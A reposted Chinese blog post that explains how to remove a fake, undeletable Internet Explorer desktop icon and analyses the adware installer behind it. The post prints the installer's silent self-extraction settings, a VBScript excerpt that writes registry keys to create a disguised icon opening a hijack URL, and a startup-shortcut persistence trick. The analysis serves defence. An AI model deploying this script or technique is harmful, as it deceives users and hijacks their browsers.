删除恶意IE图标，以及恶意桌面快捷方式[转]

中毒症状：

1 桌面上出现多个快捷方式 ， 如淘宝网 – 淘 ， 当当网 – 全球最大的中文网上书店&购物中心，以及一个名为Internet Explorer的IE图标，

2 多出来的Internet Explorer图标无法删除，点击右键只有属性，剪切等较少命令，打开此图标后会跳到指定网页，打开属性现实的是IE属性，无法剪切无法复制，用DOS命令dir /a 无法查看，在用户文件夹中也无法查看只能在桌面上看见，一般的恶意删除软件也无法删除（比如360粉碎机）（此类症状一般都是对注册表进行了恶意操作造成的）

解决方案：

1 恶意IE图标删除， 首先点击恶意IE图标属性得到网址如http://www.969dh.cn/?mt33，然后打开注册表，搜索http://www.969dh.cn/?mt33，第一次搜索后我们会来到的HKEY_CLASSES_ROOT\CLSID下 找到其父项目名称如： HKEY_CLASSES_ROOT\CLSID\{86AEFBE8-763F-0647-899C-A93278894D8E} ，

复制项目名称86AEFBE8-763F-0647-899C-A93278894D8E，然后删除此项值， 然后打开HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace

找到复制的那个项目值然后删除项，退出注册表，刷新桌面即可！

okay 终于把整个插件运行的过程摸清楚了，程序整个自起的过程真是太戏剧化了，可以说它自起的方式十分简单，但回头想想也是十分复杂的！

下面是分析：

此恶意脚本来源： www.mt30.com 站点名称： 易网绿软基地（真是道貌岸然的家伙，大家以后不要上这个网站了）

脚本感染地址：

说缺德已经给他面子了 。。。

程序构成： 主文件mt30_setup.exe 图标为安装程序图标

主程序结构： mt30_setup.exe 其实是一个自解压文件，后缀名改为rar后就看以看见其真实结构了

自解压注释说明： 和一般的自解压程序不同，此程序一直把自解压的安装过程替换为执行过程

Path=%SystemRoot%\system32\   ‘解压路径

SavePath      ‘存储目标路径

Setup=2.vbs ‘解压后执行文件

Setup=3.vbs ‘解压后执行文件

Setup=9ptvs1.exe ‘解压后执行文件  9品网络电视

Silent=1    ‘跳过开始解压对话框

Overwrite=1 ‘允许覆盖

这样当点击mt30_setup.exe 后 只会出现9品网络电视的安装界面，其他程序已在后台悄悄运行了

主要文件内容:

2.vbs 此文件为引导文件，主要用于引导恶意插件的运行，这里就一小部分代码进行分析

Rem

strWinDir = WshShell.ExpandEnvironmentStrings(”%ProgramFiles%”)

ie=strWinDir&”\Internet Explorer\iexplore.exe”

WSHShell.regwrite “HKCR\CLSID\{86AEFBE8-763F-0647-899C-A93278894D8E}\”, “Internet Exp1orer”

WSHShell.regwrite “HKCR\CLSID\{86AEFBE8-763F-0647-899C-A93278894D8E}\DefaultIcon\”, ie

WSHShell.regwrite “HKCR\CLSID\{86AEFBE8-763F-0647-899C-A93278894D8E}\Shell\”,”"

WSHShell.regwrite “HKCR\CLSID\{86AEFBE8-763F-0647-899C-A93278894D8E}\Shell\D\”, “删除(&D)”

WSHShell.regwrite “HKCR\CLSID\{86AEFBE8-763F-0647-899C-A93278894D8E}\Shell\D\Command\”, “Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl”

WSHShell.regwrite “HKCR\CLSID\{86AEFBE8-763F-0647-899C-A93278894D8E}\Shell\Open\”, “打开主页”

WSHShell.regwrite “HKCR\CLSID\{86AEFBE8-763F-0647-899C-A93278894D8E}\Shell\Open\Command\”, ie&” http://www.969dh.cn/?mt33″

WSHShell.regwrite “HKCR\CLSID\{86AEFBE8-763F-0647-899C-A93278894D8E}\Shell\属性\”, “属性”

WSHShell.regwrite “HKCR\CLSID\{86AEFBE8-763F-0647-899C-A93278894D8E}\Shell\属性\Command\”, “Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl”

WSHShell.regwrite “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{86AEFBE8-763F-0647-899C-A93278894D8E}\”, “Internet Explorer”

WSHShell.regwrite “HKCR\CLSID\{86AEFBE8-763F-0647-899C-A93278894D8E}\ShellFolder\”,”"

WSHShell.regwrite “HKCR\CLSID\{86AEFBE8-763F-0647-899C-A93278894D8E}\ShellFolder\Attributes”,10,”REG_DWORD”

此代码的作用就是用于创建前面提到的恶意IE图标，

CLSID为MS的类标识符号每个 COM 组件在 Windows 注册表中都有自己的 CLSID，以便让其他应用程序加载， 这里程序新建一个类标识ID{86AEFBE8-763F-0647-899C-A93278894D8E} ,名称为”Internet Exp1orer” ,图标为IE图标 ， 右键命令有删除，打开主页和属性，在后在桌面中就像安装回收站一样安装此类，这也是为什么我们即使用dir /a 也不能查看那到它的原因。

现在说说程序的开机加载，起初随影以为程序是在注册表中做的开机加载（大部分病毒，木马都这样干），但是翻遍流行的多个注册表项都没有发现2.vbs的影子，郁闷中 。。。

然后看了看启动文件夹就只有一个QQ.ink ， 那程序到底有哪启动呢 ？

最后实在没法，在网络上翻了了软件叫什么“Total_Uninstall” 此程序主要用于检测安装程序在安装的过程中都对系统做了哪些改动。

安装mt30_setup.exe后查看快照，它首先在system32中创建了9品德安装程序然后，在启动文件夹中创建了QQ.ink  ……..

晕   。。。。   晕    。。。。   晕  。。。。。。

居然是QQ.ink  ， 查看属性

没想到 啊  真是没想到啊  。。。。 ， 它居然是利用QQ.ink 来引导，你说它是聪明还是笨呢 ？

至少目前在随影看来，它很聪明